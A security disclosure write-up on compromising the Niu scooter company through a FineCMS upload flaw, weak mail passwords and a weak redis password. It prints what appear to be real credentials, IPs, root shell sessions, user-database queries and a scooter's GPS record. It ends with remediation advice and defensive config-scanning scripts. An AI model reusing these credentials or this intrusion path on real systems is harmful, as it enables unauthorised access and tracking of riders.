From a weak redis password to Niu's core database

The Niu (小牛) electric scooter is nice: charge it and it goes.
Unfortunately I do not have such a nice scooter, so I had to browse the official Niu website to satisfy the craving. In the process, a few more clicks turned up some security problems, which I reported to WooYun.

To make the whole vulnerability report complete, issues that have already been fixed are written up as well and marked as such.

1. cms.niu.com file upload vulnerability - fixed

cms.niu.com runs FineCMS. As reported on WooYun (FineCMS free edition: unconditional getshell, with PoC script), a webshell can be obtained directly.

This vulnerability has since been fixed.

By chance, a file named deploywebpm2.json was found in the /data/xiaoniu/ directory. Its content is as follows:

{
  "apps": [
    {
      "name": "niu-cloud-app",
      "script": "./build/bundle/main.js",
      "log_date_format": "YYYY-MM-DD",
      "exec_mode": "fork_mode",
      "env": {
        "PORT": 3000,
        "MONGO_OPLOG_URL": "mongodb://oplogger:[email protected]:27017/local?authSource=admin",
        "MONGO_URL": "mongodb://xiaoniu:[email protected]:27017/niu",
        "ROOT_URL": "http://app.cloud.niu.com/",
        "KADIRA_APP_ID": "gzBCYpXzpC4ZFN9Qp",
        "KADIRA_APP_SECRET": "926b902b-e669-4c74-b12a-eb67dd31e6de",
        "NODE_ENV": "production",
        "SMS_ACCOUNT_ID": "xiaon",
        "SMS_ACCOUNT_PASS": "xiaoniu99",
        "CLUSTER_WORKERS_COUNT": "auto"
      }
    }
  ]
}

From its content, this is the database configuration file of the Niu app. It is set aside for now and comes up again below.
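As an added example (not from the original report), a small scanner that flags embedded credentials in a pm2 deploy file like the one above: connection URLs of the form scheme://user:password@host and environment keys ending in PASS, SECRET or TOKEN. The sample document and all of its values are constructed placeholders, and the key-name list is a heuristic assumption, not something the report states.

```python
import json
import re
from urllib.parse import urlsplit

# Heuristics (assumptions, not from the report): env keys that normally hold secrets,
# and connection URLs that embed user:password@ in front of the host.
SECRET_KEY_RE = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|API_KEY)$", re.IGNORECASE)
URL_WITH_CREDS_RE = re.compile(r"^[a-z][a-z0-9+.-]*://[^/@\s]+:[^/@\s]+@", re.IGNORECASE)

# Constructed sample shaped like the deploywebpm2.json above; every value is a placeholder.
SAMPLE_PM2_JSON = """
{ "apps": [ { "name": "niu-cloud-app", "script": "./build/bundle/main.js",
  "env": { "PORT": 3000,
           "MONGO_URL": "mongodb://dbuser:EXAMPLEPASS@10.0.0.5:27017/niu",
           "ROOT_URL": "http://app.example.com/",
           "KADIRA_APP_SECRET": "example-secret-value",
           "SMS_ACCOUNT_PASS": "examplepass",
           "NODE_ENV": "production" } } ] }
"""

def find_secrets(config):
    """Walk parsed JSON; return [(json_path, reason, redacted_display)] for each embedded secret."""
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, path + [key])
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, path + [str(i)])
        elif isinstance(node, str):
            key = path[-1] if path else ""
            if URL_WITH_CREDS_RE.match(node):
                u = urlsplit(node)  # never echo the password back, only user@host
                findings.append((".".join(path), "credentials in URL",
                                 f"{u.scheme}://{u.username}:***@{u.hostname}"))
            elif SECRET_KEY_RE.search(key):
                findings.append((".".join(path), "secret-looking key", "***"))

    walk(config, [])
    return findings

def scan_pm2_json(text):
    """Parse a pm2 ecosystem/deploy JSON document and report its embedded secrets."""
    return find_secrets(json.loads(text))
```

Run it against every deploy file before it is copied to a host with a web-reachable document root; anything it reports belongs in an environment variable or secret store rather than in the file.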

2. Weak email passwords

Niu uses 263 enterprise mail, and a simple test found two weak passwords in use.
 

Most of the affected accounts use the weak passwords xiaoniu2014 or xiaoniu2015. Reading some of these mailboxes turns up the IP addresses 123.57.190.83 and 10.251.200.254.

3. Weak redis password on 123.57.190.83

This IP address should also have been visible on cms.niu.com, but since the cms.niu.com vulnerability has been fixed, this can no longer be confirmed.

The redis service on 123.57.190.83 is reachable from the Internet with authentication enabled; testing shows that the weak password xiaoniu is in use.
 

$ redis-cli -h 123.57.190.83 -a xiaoniu
123.57.190.83:6379> echo 1
"1"
123.57.190.83:6379>

Combined with the recently reported redis weakness, pointing the database backup file at authorized_keys or cron gives control of the server directly.

A reverse shell can be obtained with the method described in the post at http://zone.wooyun.org/content/23858.

The resulting shell runs as root.

4. Weak redis password on 10.251.200.254 - fixed

Testing 10.251.200.254 from 123.57.190.83 showed the same weak redis password xiaoniu; this has since been fixed.

In the same way, control of the 10.251.200.254 server was obtained. It turned out to be the Niu user database server, and the mongodb connection account and password were found on it.
 

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# ifconfig eth0
eth0: flags=4163  mtu 1500
        inet 10.251.200.254  netmask 255.255.248.0  broadcast 10.251.207.255
        ether 00:16:3e:00:0d:40  txqueuelen 1000  (Ethernet)
        RX packets 1307284290  bytes 100992745203 (94.0 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1008699098  bytes 70265841719 (65.4 GiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
sh-4.2# mongo account -u account -p
MongoDB shell version: 3.0.6
Enter password:
connecting to: account
> show collections
system.indexes
system.profile
test
tokens
users
> db.users.stats()
{
        "ns" : "account.users",
        "count" : 235961,
        "size" : 125590640,
        "avgObjSize" : 532,
        "numExtents" : 12,
        "storageSize" : 174735360,
        "lastExtentSize" : 50798592,
        "paddingFactor" : 1,
        "paddingFactorNote" : "paddingFactor is unused and unmaintained in 3.0. It remains hard coded to 1.0 for compatibility only.",
        "userFlags" : 1,
        "capped" : false,
        "nindexes" : 3,
        "totalIndexSize" : 31338608,
        "indexSizes" : {
                "_id_" : 12100480,
                "phone.number_1_emails.address_1" : 11111184,
                "services.bbs.username_1" : 8126944
        },
        "ok" : 1
}
> db.users.find().limit(5)
(five user documents omitted: each carries a phone number, e-mail addresses, an SMS verification code, and the password salt and bcrypt hash)
>

The database holds about 230,000 users (the count of 235961 above), and passwords are stored as salted hashes.

5. Connecting to the app database

The connection details of the app database were already obtained earlier. The database has access restrictions, but it can be reached from the 10.251.200.254 server.
 

sh-4.2# mongo 10.162.196.65:27017/niu -u xiaoniu -p
MongoDB shell version: 3.0.6
Enter password:
connecting to: 10.162.196.65:27017/niu
> show collections
cloud_inspect
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
niu_dynamic
niu_everyday
niu_firmware
niu_gps
niu_gps2
niu_info
niu_product
niu_push
niu_status
niu_stolen
roles
system.indexes
system.profile
users
users_bak
users_bak2
> db.niu_gps.stats()
{
        "ns" : "niu.niu_gps",
        "count" : 2804434191,
        "size" : 673064205840,
        "avgObjSize" : 240,
        "storageSize" : 718919002992,
        "numExtents" : 356,
        "nindexes" : 1,
        "lastExtentSize" : 2146426864,
        "paddingFactor" : 1,
        "systemFlags" : 0,
        "userFlags" : 1,
        "totalIndexSize" : 127256496640,
        "indexSizes" : {
                "_id_" : 127256496640
        },
        "ok" : 1
}
>

It turns out that this is where the data about the electric scooters is stored; the niu_gps collection alone holds as many as 2.8 billion records.
 

> db.niu_gps.find().limit(1)
{ "_id" : ObjectId("559a56380cf214e8ec4d4cc0"), "prot_type" : "1", "sn_id" : "N12F471R1274BEKQ", "machine_status" : "E2,A12", "lat" : 31.709278, "lng" : 119.831214, "hdop" : 0, "date" : ISODate("2015-07-06T10:19:36.590Z") }

Querying a single record gives a scooter's sn_id and its longitude and latitude at a point in time, and from those coordinates the scooter's actual geographical location can be obtained.

From this data, the location, driving route and more of any scooter can be determined.

The above process was carried out only for security testing, without any malicious operations, and the temporary data obtained along the way has been deleted.

Solution:

Niu does in fact pay close attention to security and takes the initiative to find, fix and harden. Even so, a few suggestions:

1. Keep open-source software updated to current versions in a timely manner.

2. Fix weak passwords across the board, for example in enterprise mail and redis.
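As an added example (not part of the original report), a small audit of redis.conf for the settings that made item 3 exploitable: a listener bound to every interface, a password built from the organisation's own name, and the CONFIG command left enabled. Both configuration fragments and the strong password in the hardened one are constructed placeholders, and the check assumes a Redis release that has protected-mode.

```python
import re

# Constructed redis.conf fragments (not the real server's); WEAK_CONF mirrors item 3's exposure.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
requirepass xiaoniu
"""
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass 7Kq2vB9sLm4xPz8RtW3nYc6HdF1gJa5E
rename-command CONFIG ""
"""

def parse_conf(text):
    """Map directive -> list of argument lists; quoted values keep their quotes, so "" survives."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if line:
            parts = line.split()
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def password_is_weak(pw, org_words=("xiaoniu", "niu")):
    """Too short, or the organisation's name plus up to four digits (the pattern in this report)."""
    return len(pw) < 16 or any(re.fullmatch(rf"{w}\d{{0,4}}", pw.lower()) for w in org_words)

def audit_redis_conf(text, org_words=("xiaoniu", "niu")):
    """Return findings for the settings that made item 3 exploitable; [] means none."""
    conf = parse_conf(text)
    findings = []
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(addr in ("0.0.0.0", "*", "::") for addr in binds):
        findings.append("bind: listening on all interfaces")
    mode = (conf.get("protected-mode") or [["yes"]])[-1]  # assumes the modern default of yes
    if not mode or mode[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    pw = (conf.get("requirepass") or [[]])[-1]
    if not pw:
        findings.append("requirepass: no password set")
    elif password_is_weak(pw[0], org_words):
        findings.append("requirepass: weak password")
    renamed = {a[0].upper(): a[1] for a in conf.get("rename-command", []) if len(a) == 2}
    if renamed.get("CONFIG") not in ('""', "''"):
        findings.append("rename-command: CONFIG still enabled for remote clients")
    return findings
```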
